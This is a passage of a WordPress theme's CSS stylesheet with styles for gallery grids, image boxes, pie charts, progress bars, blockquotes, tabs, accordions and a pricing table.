0.3s ease-out; -o-transition: all 0.3s ease-out; transition: all 0.3s ease-out; } .kleo-thumbs-prev { left: -35px; top: 50%; margin-top: -37px; border-radius: 0 3px 3px 0; } .kleo-thumbs-next { right: -35px; top: 50%; margin-top: -37px; border-radius: 3px 0 0 3px; } .kleo-gallery:hover .kleo-thumbs-prev { left: 0; color: #fff; background: rgba(0, 0, 0, 0.1); } .kleo-gallery:hover .kleo-thumbs-next { right: 0; color: #fff; background: rgba(0, 0, 0, 0.1); } .kleo-gallery .kleo-thumbs-prev:hover, .kleo-gallery .kleo-thumbs-next:hover { background: rgba(0, 0, 0, 0.3); } .kleo-thumbs-prev i, .kleo-thumbs-next i { line-height: 75px; } /* Carousel Gallery Grid */ .kleo-gallery-grid {} .kleo-gallery-grid ul.kleo-isotope { padding: 0; list-style: none; clear: both; float: left; margin: 0; position: relative; width: 100.4%; } .kleo-gallery-grid .kleo-isotope .isotope-item { display: inline-block; float: left; overflow: hidden; } .kleo-gallery-grid .kleo-isotope .isotope-item:last-child {} .kleo-gallery-grid .kleo-isotope .isotope-item img { width: 100%; } .kleo-small-gap.kleo-gallery-grid .kleo-gallery-inner { margin-bottom: 1px;margin-right: 1px; position: relative; } .kleo-large-gap.kleo-gallery-grid .kleo-gallery-inner { margin-bottom: 10px;margin-right: 10px; position: relative; } .kleo-small-gap.kleo-gallery-grid { padding: 1px 0 0 1px; } .kleo-gallery-grid .kleo-gallery-inner { display: inline-block; width: 100%; } .kleo-large-gap.kleo-gallery-grid { padding: 10px 0 0 10px; } .kleo-masonry-item, .kleo-isotope > li {float:left;} .kleo-masonry-item, .kleo-isotope > li {width:33.3%; } .template-page.col-sm-12 .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li {width:24.9%;} .template-page.col-sm-12 .section-container.container-full .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li {width:16.6%;} @media (min-width: 1440px) { .kleo-isotope > .kleo-masonry-item, .kleo-isotope > li { width: 33.3%; } .template-page.col-sm-12 .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li {width:24.9%;} .template-page.col-sm-12 .section-container.container-full .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li {width:16.6%;} } @media (min-width: 1200px) and (max-width: 1439px) { .kleo-isotope > .kleo-masonry-item, .kleo-isotope > li { width:33.3%; } .template-page.col-sm-12 .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li {width:24.9%;} } @media (min-width: 992px) and (max-width: 1199px) { .kleo-masonry-item, .kleo-isotope > li, .template-page.col-sm-12 .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li { width:33.3%; } .col-sm-9 .kleo-isotope > li, .col-sm-9 .kleo-masonry-item, .col-sm-6 .kleo-isotope > li, .col-sm-6 .kleo-masonry-item{width:49.9%;} } @media (max-width: 991px) { .kleo-masonry-item, .kleo-isotope > li, .template-page.col-sm-12 .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li { width:49.9% } } @media (min-width: 480px) and (max-width: 767px) { .kleo-masonry-item, .kleo-isotope > li, .template-page.col-sm-12 .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li { width: 49.9%; } } @media screen and (max-width: 480px) { .kleo-masonry-item, .kleo-isotope > li, .template-page.col-sm-12 .kleo-masonry-item, .template-page.col-sm-12 .kleo-isotope > li, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > .kleo-masonry-item, .template-page.col-sm-12 .section-container.container-full .kleo-isotope > li { width:100% !important; } } /* Bootstrap Carousel */ .container-section {} .container-section {} .carousel-inner {} .carousel-inner .item{} .carousel-caption h3 { color: #fff; } .carousel-body {} /* ----------------------------------------- 08. Single image ----------------------------------------- */ img { height: auto; } .wpb_single_image img { height: auto; max-width: 100%; } .wpb_single_image.vc_align_center { text-align: center; } .wpb_single_image.vc_align_right { text-align: right; } .wpb_single_image.vc_align_left { text-align: left; } div .vc_box_rounded { border-radius: 4px; -webkit-box-shadow: none; box-shadow: none; } div .vc_box_outline, div .vc_box_outline_circle { border-radius: 0px; -webkit-box-shadow: none; box-shadow: none; padding: 6px; border: 1px solid #ebebeb; } div .vc_box_border, div .vc_box_border_circle { border-radius: 0px; -webkit-box-shadow: none; box-shadow: none; padding: 6px; border: none; } div .vc_box_shadow, div .vc_box_shadow_border, div .vc_box_shadow_border_circle, div .vc_box_shadow_circle { border-radius: 0px; -webkit-box-shadow: 0 0px 5px rgba(0, 0, 0, 0.1); box-shadow: 0 0px 5px rgba(0, 0, 0, 0.1); } div .vc_box_shadow_border, div .vc_box_shadow_border_circle { padding: 6px; } div .vc_box_shadow_3d { border-radius: 0px; -webkit-box-shadow: none; box-shadow: none; margin-bottom: 15px; } div .vc_box_circle, div .vc_box_outline_circle, div .vc_box_border_circle, div .vc_box_shadow_circle, div .vc_box_shadow_border_circle { border-radius: 5000px; border-radius: 50%; -webkit-box-shadow: none; box-shadow: none; overflow: hidden; } div .vc_box_shadow_circle, div .vc_box_shadow_border_circle { -webkit-box-shadow: 0 0px 5px rgba(0, 0, 0, 0.1); box-shadow: 0 0px 5px rgba(0, 0, 0, 0.1); } .vc_box_shadow_3d_wrap { position: relative; z-index: 0; display: inline-block; max-width: 100%; } .vc_box_shadow_3d_wrap:after, .vc_box_shadow_3d_wrap:before { content: ""; position: absolute; box-shadow: 0 15px 10px rgba(0, 0, 0, 0.5); left: 10px; bottom: 8%; width: 40%; height: 20%; max-height: 100px; max-width: 300px; z-index: -1; -webkit-transform: rotate(-6deg); -ms-transform: rotate(-6deg); transform: rotate(-6deg); } .vc_box_shadow_3d_wrap:after { left: auto; right: 10px; -webkit-transform: rotate(6deg); -ms-transform: rotate(6deg); transform: rotate(6deg); } .vc_box_outline.vc_box_border_blue, .vc_box_outline_circle.vc_box_border_blue { border-color: #5472d2; } .vc_box_border.vc_box_border_blue, .vc_box_border_circle.vc_box_border_blue { background-color: #5472d2; } .vc_box_outline.vc_box_border_turquoise, .vc_box_outline_circle.vc_box_border_turquoise { border-color: #00c1cf; } .vc_box_border.vc_box_border_turquoise, .vc_box_border_circle.vc_box_border_turquoise { background-color: #00c1cf; } .vc_box_outline.vc_box_border_pink, .vc_box_outline_circle.vc_box_border_pink { border-color: #fe6c61; } .vc_box_border.vc_box_border_pink, .vc_box_border_circle.vc_box_border_pink { background-color: #fe6c61; } .vc_box_outline.vc_box_border_violet, .vc_box_outline_circle.vc_box_border_violet { border-color: #8d6dc4; } .vc_box_border.vc_box_border_violet, .vc_box_border_circle.vc_box_border_violet { background-color: #8d6dc4; } .vc_box_outline.vc_box_border_peacoc, .vc_box_outline_circle.vc_box_border_peacoc { border-color: #4cadc9; } .vc_box_border.vc_box_border_peacoc, .vc_box_border_circle.vc_box_border_peacoc { background-color: #4cadc9; } .vc_box_outline.vc_box_border_chino, .vc_box_outline_circle.vc_box_border_chino { border-color: #cec2ab; } .vc_box_border.vc_box_border_chino, .vc_box_border_circle.vc_box_border_chino { background-color: #cec2ab; } .vc_box_outline.vc_box_border_mulled_wine, .vc_box_outline_circle.vc_box_border_mulled_wine { border-color: #50485b; } .vc_box_border.vc_box_border_mulled_wine, .vc_box_border_circle.vc_box_border_mulled_wine { background-color: #50485b; } .vc_box_outline.vc_box_border_vista_blue, .vc_box_outline_circle.vc_box_border_vista_blue { border-color: #75d69c; } .vc_box_border.vc_box_border_vista_blue, .vc_box_border_circle.vc_box_border_vista_blue { background-color: #75d69c; } .vc_box_outline.vc_box_border_black, .vc_box_outline_circle.vc_box_border_black { border-color: #2a2a2a; } .vc_box_border.vc_box_border_black, .vc_box_border_circle.vc_box_border_black { background-color: #2a2a2a; } .vc_box_outline.vc_box_border_grey, .vc_box_outline_circle.vc_box_border_grey { border-color: #ebebeb; } .vc_box_border.vc_box_border_grey, .vc_box_border_circle.vc_box_border_grey { background-color: #ebebeb; } .vc_box_outline.vc_box_border_orange, .vc_box_outline_circle.vc_box_border_orange { border-color: #f89406; } .vc_box_border.vc_box_border_orange, .vc_box_border_circle.vc_box_border_orange { background-color: #f89406; } .vc_box_outline.vc_box_border_sky, .vc_box_outline_circle.vc_box_border_sky { border-color: #5aa1e3; } .vc_box_border.vc_box_border_sky, .vc_box_border_circle.vc_box_border_sky { background-color: #5aa1e3; } .vc_box_outline.vc_box_border_green, .vc_box_outline_circle.vc_box_border_green { border-color: #6dab3c; } .vc_box_border.vc_box_border_green, .vc_box_border_circle.vc_box_border_green { background-color: #6dab3c; } .vc_box_outline.vc_box_border_juicy_pink, .vc_box_outline_circle.vc_box_border_juicy_pink { border-color: #f4524d; } .vc_box_border.vc_box_border_juicy_pink, .vc_box_border_circle.vc_box_border_juicy_pink { background-color: #f4524d; } .vc_box_outline.vc_box_border_sandy_brown, .vc_box_outline_circle.vc_box_border_sandy_brown { border-color: #f79468; } .vc_box_border.vc_box_border_sandy_brown, .vc_box_border_circle.vc_box_border_sandy_brown { background-color: #f79468; } .vc_box_outline.vc_box_border_purple, .vc_box_outline_circle.vc_box_border_purple { border-color: #b97ebb; } .vc_box_border.vc_box_border_purple, .vc_box_border_circle.vc_box_border_purple { background-color: #b97ebb; } .vc_box_outline.vc_box_border_white, .vc_box_outline_circle.vc_box_border_white { border-color: #ffffff; } .vc_box_border.vc_box_border_white, .vc_box_border_circle.vc_box_border_white { background-color: #ffffff; } /* ----------------------------------------- 09. Pie chart ----------------------------------------- */ .vc_pie_chart { z-index: 0; text-align: center; opacity: 0; } .vc_pie_chart.vc_ready { opacity: 1; } .vc_pie_chart .vc_pie_wrapper { position: relative; margin: 0 auto; } .vc_pie_chart canvas { position: relative; z-index: 1; } .vc_pie_chart .vc_pie_chart_value { font-size: 200%; position: absolute; top: 0; left: 0; display: block; width: 100%; height: 100%; text-align: center; } .vc_pie_chart[data-pie-color="wpb_button"] .vc_pie_chart_back { border-color: #f7f7f7; } .vc_pie_chart[data-pie-color="btn-primary"] .vc_pie_chart_back { border-color: #0088cc; } .vc_pie_chart[data-pie-color="btn-info"] .vc_pie_chart_back { border-color: #58b9da; } .vc_pie_chart[data-pie-color="btn-success"] .vc_pie_chart_back { border-color: #6ab165; } .vc_pie_chart[data-pie-color="btn-warning"] .vc_pie_chart_back { border-color: #ff9900; } .vc_pie_chart[data-pie-color="btn-danger"] .vc_pie_chart_back { border-color: #ff675b; } .vc_pie_chart[data-pie-color="btn-inverse"] .vc_pie_chart_back { border-color: #555555; } .vc_pie_chart_back { display: block; position: absolute; width: 100%; height: 100%; top: 0; left: 0; border: 6px solid #f7f7f7; border-radius: 999px; border-radius: 50%; opacity: 0.3; filter: alpha(opacity=30); -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } /* ----------------------------------------- 11. Progress bar ----------------------------------------- */ .vc_progress_bar .vc_single_bar { background: #f7f7f7; position: relative; margin-bottom: 11.666666666666666px; -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1) inset; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1) inset; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .vc_progress_bar .vc_single_bar:last-child { margin-bottom: 0; } .vc_progress_bar .vc_single_bar .vc_label { display: block; padding: 0.5em 1em; position: relative; z-index: 1; } .vc_progress_bar .vc_single_bar.bar_blue .vc_bar { background-color: #0074CC; } .vc_progress_bar .vc_single_bar.bar_blue .vc_label { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .vc_progress_bar .vc_single_bar.bar_turquoise .vc_bar { background-color: #49afcd; } .vc_progress_bar .vc_single_bar.bar_turquoise .vc_label { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .vc_progress_bar .vc_single_bar.bar_green .vc_bar { background-color: #5bb75b; } .vc_progress_bar .vc_single_bar.bar_green .vc_label { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .vc_progress_bar .vc_single_bar.bar_orange .vc_bar { background-color: #faa732; } .vc_progress_bar .vc_single_bar.bar_orange .vc_label { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .vc_progress_bar .vc_single_bar.bar_red .vc_bar { background-color: #da4f49; } .vc_progress_bar .vc_single_bar.bar_red .vc_label { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .vc_progress_bar .vc_single_bar.bar_black .vc_bar { background-color: #414141; } .vc_progress_bar .vc_single_bar.bar_black .vc_label { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .vc_progress_bar .vc_single_bar .vc_bar { display: block; position: absolute; height: 100%; background-color: #e0e0e0; width: 0%; top: 0; left: 0; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; transition: width 1s linear; -moz-transition: width 1s linear; -webkit-transition: width 1s linear; -o-transition: width 1s linear; } .vc_progress_bar .vc_single_bar .vc_bar.striped { background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, transparent), color-stop(0.5, transparent), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, transparent), to(transparent)); background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); -webkit-background-size: 40px 40px; -moz-background-size: 40px 40px; -o-background-size: 40px 40px; background-size: 40px 40px; } .vc_progress_bar .vc_single_bar .vc_bar.animated { -webkit-animation: progress-bar-stripes 2s linear infinite; -moz-animation: progress-bar-stripes 2s linear infinite; -ms-animation: progress-bar-stripes 2s linear infinite; -o-animation: progress-bar-stripes 2s linear infinite; animation: progress-bar-stripes 2s linear infinite; } .kleo-transform .vc_bar.animated { opacity: 1; } @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-moz-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-ms-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-o-keyframes progress-bar-stripes { from { background-position: 0 0; } to { background-position: 40px 0; } } @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } /* ----------------------------------------- Client Logos ----------------------------------------- */ .client-wrapper { text-align: center; } .client { display: inline-block; width: 183px; margin: 0 10px 20px; } .client:hover img { opacity: 0.8; } .client a, .b-client img { display: block; } .client img { max-width: 100%; opacity: 0.3; -webkit-transition: opacity 0.2s ease-in-out; transition: opacity 0.2s ease-in-out; } /* ----------------------------------------- Isotope ----------------------------------------- */ .isotope-item { z-index: 2; } .isotope-hidden.isotope-item { pointer-events: none; z-index: 1; } /* Isotope CSS3 transitions */ .isotope, .isotope .isotope-item { -webkit-transition-duration: 0.8s; -moz-transition-duration: 0.8s; -ms-transition-duration: 0.8s; -o-transition-duration: 0.8s; transition-duration: 0.8s; } .isotope { -webkit-transition-property: height, width; -moz-transition-property: height, width; -ms-transition-property: height, width; -o-transition-property: height, width; transition-property: height, width; } .isotope .isotope-item { -webkit-transition-property: -webkit-transform, opacity; -moz-transition-property: -moz-transform, opacity; -ms-transition-property: -ms-transform, opacity; -o-transition-property: -o-transform, opacity; transition-property: transform, opacity; } /* disabling Isotope CSS3 transitions */ .isotope.no-transition, .isotope.no-transition .isotope-item, .isotope .isotope-item.no-transition { -webkit-transition-duration: 0s; -moz-transition-duration: 0s; -ms-transition-duration: 0s; -o-transition-duration: 0s; transition-duration: 0s; } /* End: Recommended Isotope styles */ /* disable CSS transitions for containers with infinite scrolling*/ .isotope.infinite-scrolling { -webkit-transition: none; -moz-transition: none; -ms-transition: none; -o-transition: none; transition: none; } /* ----------------------------------------- iSotope Posts ----------------------------------------- */ /*.isotope-item { width:100%; }*/ .post-item { /*background: #fff;*/ padding: 10px; } .grid-posts { clear: both; } .grid-posts .format-quote .inner-content, .grid-posts .format-link .inner-content, .grid-posts .format-status .inner-content, .grid-posts .format-aside .post-header, .grid-posts .format-standard .post-header { padding: 10px; border-bottom: none; } .grid-posts .format-aside .post-header:before, .grid-posts .format-standard .post-header:before { content: none; } .grid-posts .entry-summary { word-wrap: break-word; } .format-quote .post-title, .format-quote .inner-content > h3 { margin-bottom: 20px; font-style: italic; } .post-image {} .post-audio {} #widget .widgetContainer.g-box-full { border-radius: 0 !important; box-shadow: none !important; } .post-header { padding: 20px 10px; position: relative; } .post-header:before { /*width: 6px; height: 6px; display: block; content: ' '; z-index: 9999; position: absolute; top: -6px; left: 50%; margin-left: -3px; border-top: 0; border-left: 6px solid transparent !important; border-right: 6px solid transparent !important; border-bottom-style: solid; border-bottom-width: 6px;*/ /*border-color: #fff;*/ } .post-title { margin-bottom: 0; } .post-meta {} .post-info { /*background: #fff;*/ padding: 0 10px 20px; } .post-footer { padding: 10px; display: inline-block; width: 100%; } /* ----------------------------------------- Callout Blockquote ----------------------------------------- */ .callout-blockquote { margin: 20px 0; text-align: left; } .callout-blockquote blockquote p { font-size: 14px; font-weight: 300; /*line-height: 20px;*/ padding-left: 30px; position: relative; } .callout-blockquote blockquote p:before { font: 20px 'fontello'; content: "\e854"; position: absolute; left:0; } .callout-blockquote blockquote { position: relative; border-style: solid; border-width: 1px; border-radius: 4px; padding: 30px 25px 30px 30px; font-style: italic; background: transparent !important; } .callout-blockquote figcaption { margin: 12px 0 0 50px; } .callout-blockquote figcaption p { margin-bottom: 0; } .callout-blockquote.dark blockquote { background: #454951; border-color: #454951; color: #FFF; } .callout-blockquote blockquote:after, .callout-blockquote blockquote:before { top: 100%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; border-right: none; } .callout-blockquote blockquote:after { border-color: rgba(247, 247, 247, 0); border-width: 18px; left: 0; margin-left: 25px; border-top-color: #transparent !important; } .callout-blockquote blockquote:before { border-color: rgba(239, 239, 239, 0); border-width: 20px; left: 0; margin-left: 24px; } .callout-blockquote.dark blockquote:after, .callout-blockquote.dark blockquote:before { border-color: rgba(51,51,51,0); border-top-color: blue; } /* ----------------------------------------- Default Blockquote ----------------------------------------- */ blockquote { padding: 10px 20px; margin: 20px 0; border-left-style: solid; border-left-width: 5px; display: inline-block; } blockquote p { font-size: 16px; font-weight: 300; line-height: 24px; margin: 0; } blockquote h6 { margin-top: 0; } blockquote cite { font-size: 11px; text-transform: uppercase; color: #bbb; display: block; } /* ----------------------------------------- Before & After - Twentytwenty plugin ----------------------------------------- */ .twentytwenty-container { position: relative; z-index:99999; } .twentytwenty-container img { display: block; position: absolute; top: 0; width: 100%; } /* ----------------------------------------- Lists ----------------------------------------- */ .container .wpb_wrapper li { text-align: left; } .fontelo-list { padding-left: 0; list-style: none; } .fontelo-list li { padding-left: 2.6em; padding-bottom: 5px; } .fontelo-list i { font-weight: normal; font-style: normal; margin-left: -2.8em; width: 2.4em; display: inline-block; text-align: center; } .fontelo-list.list-icon-large li { padding-left: 2.4em; } .fontelo-list i { font-family: 'fontello'; } .list-divider li:first-child, .list-divider.dashed li:first-child { border-top: none; } .list-divider li { border-top-style: solid; border-top-width: 1px; padding-bottom: 5px; padding-top: 4px; } .list-divider.dashed li { border-top-style: dashed; } .standard-list, .ordered-list { padding-left: 0; list-style: none; } .standard-list i, .ordered-list i, .list-unstyled i { display: none; } .standard-list li:before { font: 1.7em/1em "fontello"; content: "\e976"; display: inline-block; float: left; margin-right: 10px; } .standard-list li:after { display: table; content: ' '; clear: both; } .ordered-list { counter-reset: my-badass-counter; } .ordered-list li:before { border-radius: 9px; content: counter(my-badass-counter, decimal); counter-increment: my-badass-counter; display: inline-block; float: left; text-align: center; font-size: 11px; line-height: 18px; margin-right: 6px; margin-left: -1.8em; width: 18px; height: 18px; background: #777; color: #fff; } .ordered-list.colored-icons li:before {} .ordered-list li { padding-left: 1.8em; } .ordered-list.upper-roman li:before { content: counter(my-badass-counter, upper-roman); } .list-icon-large i { font-size: 1.3333333333333333em; } .shadow-icons i { text-shadow: 1px 1px 1px rgba(127, 127, 127, 0.3); } .dl-horizontal dd, .dl-default dd { margin-bottom: 20px; } .dl-horizontal dd ul { margin-bottom: 0; } .dl-default dd {} .one-by-one-animated li { list-style-type: none; } /* ----------------------------------------- Tabs & Pills ----------------------------------------- */ .nav > li > a:hover, .nav > li > a:focus {} /* Tabs */ .nav-tabs, .nav-pills { position: relative; } .nav-tabs {} .tab-content > .tab-pane { padding: 30px 0 0; /* TEMPORAR */ } .nav-tabs > li > a { margin-right: -1px; border-radius: 0; font-size: 16px; font-weight: 300; } .nav-tabs > li.active > a {} .nav-tabs > li.active > a, .nav-tabs > li.active > a:hover, .nav-tabs > li.active > a:focus { transition: all 0.2s ease 0s; } /* Tabs Square Style */ .tabs-style-square {} .tabs-style-square > li { } .tabs-style-square > li > a { margin-top: 4px; padding-bottom: 6px; padding-top: 6px; line-height: 2.0825; } .tabs-style-square > li.active > a, .tabs-style-square > li.active > a:hover, .tabs-style-square > li.active > a:focus { border-bottom-color: transparent !important; } .tabs-style-square .tabdrop > a { background-color: transparent; border-color: transparent; } .tabs-style-square .tabdrop > a:hover, .tabs-style-square .tabdrop > a:focus, .tabs-style-square .tabdrop.open > a {} /* Tabs Default Style */ .kleo-tabs .tabs-style-default .tabdrop .dropdown-menu { margin-top: 2px; } .tabs-style-default > li > a { border-top: 2px solid transparent; } .tabs-style-default > li.active > a, .tabs-style-default > li.active > a:hover, .tabs-style-default > li.active > a:focus { border-top-style: solid; border-top-width: 2px; border-bottom-color: transparent !important; } /* Tabs Line Style */ .kleo-tabs .tabs-style-line .tabdrop .dropdown-menu { margin-top: 2px; } .tabs-style-line {} .tabs-style-line > li { margin-bottom: -1px; } .tabs-style-line > li > a { border: none; padding-left: 0; padding-right: 0; margin: 0 15px; border-bottom: 2px solid transparent; } .tabs-style-line > li > a:hover { background-color: transparent; } .tabs-style-line .tabdrop > a { margin: inherit; padding: 10px 15px; } .tabs-style-line > li.active > a, .tabs-style-line > li.active > a:hover, .tabs-style-line > li.active > a:focus { border: none; border-bottom-style: solid; border-bottom-width: 2px; background-color: transparent; } .nav-tabs.tabs-centered { text-align: center; } .nav-tabs.tabs-centered li { float: none; /* TEMPORAR */ display: inline-block; /* TEMPORAR */ } /* Pills */ .nav-pills {} .nav-pills > li {} .nav-pills > li > a { border-radius: 0; border-style: solid; border-width: 1px; /*font-family: 'Roboto Condensed', sans-serif;*/ font-size: 16px; font-weight: 300; } .nav-pills > li > a > i { margin: 0 10px; } .nav-pills > li + li { margin-left: -1px; } .nav-pills > li.active > a {} .nav-pills > li.active > a, .nav-pills > li.active > a:hover, .nav-pills > li.active > a:focus { border-style: solid; border-width: 1px; } .pills-style-square .tabdrop {} .pills-style-square {} .nav-pills.tabs-centered { text-align: center; } .nav-pills.tabs-centered li { float: none; /* TEMPORAR */ display: inline-block; /* TEMPORAR */ } .pills-style-ghost {} .main-color .nav-pills.pills-style-ghost > li.active a { background: rgba(255,255,255,0.1) !important; } .main-color .nav-pills.pills-style-ghost > li.active a:hover { background: rgba(255,255,255,0.2); border: 1px solid rgba(255,255,255, 0.1); } .main-color .nav-pills.pills-style-ghost > li a:hover { background: rgba(255,255,255,0.1); } .main-color .nav-pills.pills-style-ghost > li.active a, .main-color .nav-pills.pills-style-ghost > li > a { border: 1px solid rgba(255,255,255, 0.1) !important; color: #fff; padding: 12px 20px; } /* All tabdrop */ .kleo-tabs .tabdrop .dropdown-menu { border-style: solid; border-width: 1px; margin-top: 1px; } .kleo-tabs .tabdrop .dropdown-menu li { float: none; width: 100%; text-align: left; font-size: 12px; } .kleo-tabs .tabdrop .dropdown-menu li a { padding: 0 10px; height: 33px; line-height: 33px; font-size: 12px; } .kleo-tabs .tabdrop .dropdown-menu li.current a {} .kleo-tabs .tabdrop .dropdown-menu li a span { left: inherit; top: 6px; right: 10px; display: inline-block; } .kleo-tabs .tabdrop .dropdown-menu li.current a {} .kleo-tabs .tabdrop .dropdown-menu li a span { box-shadow: none; } /* Temporar for tabdop */ .kleo-tabs .tabdrop .dropdown-menu { text-align: left; } .kleo-tabs .tabdrop > a.dropdown-toggle, .kleo-tabs .tabdrop > a.dropdown-toggle:hover, .kleo-tabs .tabdrop > a.dropdown-toggle:focus { border-color: transparent; background: transparent; } .kleo-tabs .nav .open > a.dropdown-toggle, .kleo-tabs .nav .open > a.dropdown-toggle:hover, .kleo-tabs .nav .open > a.dropdown-toggle:focus { /*border-color: #e5e5e5;*/ } .kleo-tabs .tabdrop:before { font: 120% "fontello"; content: "\e97c"; display: block; text-align: center; transition: all 0.4s ease-in-out 0s; position: absolute; top: 20px; left: 12px; z-index: 12; pointer-events:none; } /* Specific tabdrop */ .kleo-tabs .nav-pills .tabdrop:before, .kleo-tabs .tabs-style-line .tabdrop:before { top: 12px; } .kleo-tabs .tabs-style-default .tabdrop:before { top: 15px; } .kleo-tabs .tabs-style-line .tabdrop .dropdown-menu { } .kleo-tabs .nav-pills .tabdrop .dropdown-menu { } .kleo-tabs .tabs-style-default .tabdrop.pull-right > .dropdown-menu, .kleo-tabs .tabs-style-square .tabdrop.pull-right > .dropdown-menu { right: -1px; } /* Tour section */ .wpb_tour .nav-tab { float: left; width: 31.6667%; } .wpb_tour.pos-right .nav-tab { float: right; } .wpb_tour .nav-tab li { clear: left; margin: 0 0 1px; width: 100%; } .wpb_tour .tab-content { border: none; box-sizing: border-box; float: left; padding: 0 0 0 21.7391px; width: 68.3333%; } .wpb_tour .tab-content > .tab-pane { padding: 0; } .wpb_tour .tab-pane .kleo_text_column:first-child p:first-child { margin-top: 0; } .wpb_tour_next_prev_nav { padding-top: 10px; } @media (max-width: 767px) { .wpb_tour .nav-tab, .wpb_tour .tab-content { float: none; width: 100%; } } /* ----------------------------------------- Accordion & Tooggle ----------------------------------------- */ /* Default panel theme*/ .panel { -webkit-box-shadow: none; box-shadow: none; } .panel-default {} .panel-default > .panel-heading {} .panel-heading { border-radius: 0; } .panel-group .panel-heading, .panel-toggle .panel-heading { border-bottom: 0; } .panel-default .panel-title { font-size: 13px; font-weight: bold; } .panel-default .panel-title a {} .panel .icon-closed, .panel .icon-opened {} .panel-group .panel, .panel-toggle.panel { border-radius: 0; } .panel-toggle.panel { margin-bottom:0; } .wpb_wrapper .panel + .panel { margin-top: 5px; } /* Kleo panel theme*/ .panel-kleo, .panel-kleo .panel {} .panel-kleo > .panel-heading, .panel-kleo .panel > .panel-heading {} .panel-kleo .panel-heading + .panel-collapse .panel-body {} .panel-group .panel-kleo + .panel { margin-top: 0; } .panel-kleo .panel-title { font-weight: 500; font-size: 18px; } .panel-kleo .panel-title a {} .panel-kleo .panel-title a b { font-weight: normal; } .panel-kleo .icon-closed, .panel-kleo .icon-opened {} .panel.icons-to-left .icon-closed, .panel.icons-to-left .icon-opened, .panel-group.icons-to-left .icon-closed, .panel-group.icons-to-left .icon-opened{ float: left; margin-right: 20px; } .panel.icons-to-right .icon-closed, .panel.icons-to-right .icon-opened, .panel-group.icons-to-right .icon-closed, .panel-group.icons-to-right .icon-opened{ float: right; margin-left: 20px; } /* ----------------------------------------- Pricing Table ----------------------------------------- */ .pricing-table {} .pricing-table .panel-info { border: none; border-radius: 0; box-shadow: 0 0 1px 0 rgba(0, 0, 0, 0.18); } .pricing-table .panel-info > .panel-heading { border: none; padding-bottom: 0; } .pricing-table .panel-heading h3 { margin-bottom: 0; padding-bottom: 10px; text-transform: uppercase; border-bottom-style: solid; border-bottom-width: 1px; } .pricing-table .panel-body { font-style: italic; padding: 5px 15px; } .pricing-table .panel-body > strong { font-style: normal; } .pricing-table .pmpro_level-expiration {} .pricing-table .pmpro-price { padding: 20px 15px; } .pricing-table .pmpro-price .lead { font-style: normal; font-size: 54px; line-height: 64px; margin: 0; font-weight: 300; } .pricing-table .pmpro-price .lead > strong { font-weight: 300; } .pricing-table .pmpro-price sup { font-size: 50%; top: -0.75em; } .pricing-table .lead {} .pricing-table .extra-description { padding: 5px 15px 30px; font-size: 12px; } .pricing-table ul.list-group { padding: 20px 15px 0; } .container .pricing-table li.list-group-item { border: none; margin-bottom: 0; border-radius: 0; padding: 5px 15px; font-size: 12px; text-transform: uppercase; } .container .pricing-table ul.list-group li:last-child { border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 25px; } .pricing-table .list-group-item.unavailable:before, .pricing-table .pricing-table .extra-description:before { display: none; } .pricing-table .list-group-item:before { content: 